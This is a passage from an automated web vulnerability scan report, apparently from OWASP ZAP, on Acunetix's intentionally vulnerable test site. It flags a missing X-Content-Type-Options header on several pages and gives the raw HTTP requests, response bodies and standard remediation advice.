          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        24. GET http://testaspnet.vulnweb.com/styles.css
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/styles.css HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/css
          Last-Modified: Thu, 29 May 2008 14:36:50 GMT
          Accept-Ranges: bytes
          ETag: "c8c2136e99c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2597
          
          
          Response body (2597 bytes)
          body
          {
          	padding-right: 0px;
          	padding-left: 0px;
          	list-style-position: outside;
          	background: url(images/background.gif) #e6dccf fixed repeat-y center top;
          	padding-bottom: 0px;
          	margin: 0px;
          	font: small tahoma, "Bitstream Vera Sans" , "Trebuchet MS" , "Lucida Grande" , lucida, helvetica, sans-serif;
          	padding-top: 0px;
          	list-style-type: square;
          }
          A.menu
          {
          	padding-right: 10px;
          	padding-left: 10px;
          	color: #806640;
          	text-decoration: none;
          	background-color: #e6dccf;
          }
          A.menu:hover
          {
          	padding-right: 10px;
          	padding-left: 10px;
          	color: #e6dccf;
          	text-decoration: none;
          	background-color: #BF8630;
          }
          A.NewsOperation
          {
          	font-size: xx-small;
          	margin-left: 5px;
          	color: #BF8630;
          	margin-right: 5px;
          	text-decoration: none;
          }
          A.NewsOperation:hover
          {
          	font-size: xx-small;
          	margin-left: 5px;
          	color: #E6B873;
          	margin-right: 5px;
          	text-decoration: none;
          }
          .Framed
          {
          	border: #E6DCCF 1px solid;
          }
          .FramedForm
          {
          	border-right: #806640 1px solid;
          	border-top: #806640 1px solid;
          	border-left: #806640 1px solid;
          	border-bottom: #806640 1px solid;
          	background-color: #e6dccf;
          }
          .MenuBar
          {
          	border-top: #806640 1px solid;
          	border-bottom: #806640 1px solid;
          	background-color: #e6dccf;
          }
          .Calendar
          {
          	border-right: #e6b873 1px solid;
          	border-top: #e6b873 1px solid;
          	border-left: #e6b873 1px solid;
          	border-bottom: #e6b873 1px solid;
          }
          INPUT
          {
          	border: #806640 1px solid;
          }
          INPUT.classic
          {
          	border: none;
          }
          TEXTAREA
          {
          	border: #807940 1px solid;
          }
          INPUT.PostNews
          {
          	border: #807940 1px solid;
          	width: 500px;
          }
          INPUT.Login
          {
          	border: #807940 1px solid;
          	width: 250px;
          }
          TEXTAREA.PostNews
          {
          	border: #807940 1px solid;
          	width: 500px;
          	height: 300px;
          }
          TEXTAREA.CommentTA
          {
          	border: #807940 1px solid;
          	width: 450px;
          	height: 100px;
          }
          .NewsDate
          {
          	border-top: #e6b873 2px solid;
          	font-size: xx-small;
          	border-bottom: #e6b873 1px solid;
          }
          
          .NewsTitle
          {
          	font-weight: bolder;
          	margin-bottom: 5px;
          	text-transform: capitalize;
          	padding-top: 2px;
          }
          .NewsShort
          {
          	padding-left: 5px;
          	margin-bottom: 10px;
          }
          .NewsLong
          {
          	padding-left: 5px;
          	margin-bottom: 10px;
          	border-bottom: #e6b873 1px solid;
          }
          .CommentText
          {
          	margin-top: 10px;
          	margin-bottom: 5px;
          }
          .CommentAuthor
          {
          	font-size: xx-small;
          	margin-bottom: 10px;
          }
          .Comment
          {
          	clear: both;
          	border-right: #806640 1px solid;
          	padding-right: 5px;
          	padding-left: 5px;
          	float: none;
          	padding-bottom: 5px;
          	border-left: #806640 1px solid;
          	width: 500px;
          	padding-top: 5px;
          }
          .Calendar
          {
          	border: solid 1px #E6B873;
          }
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        25. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        26. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
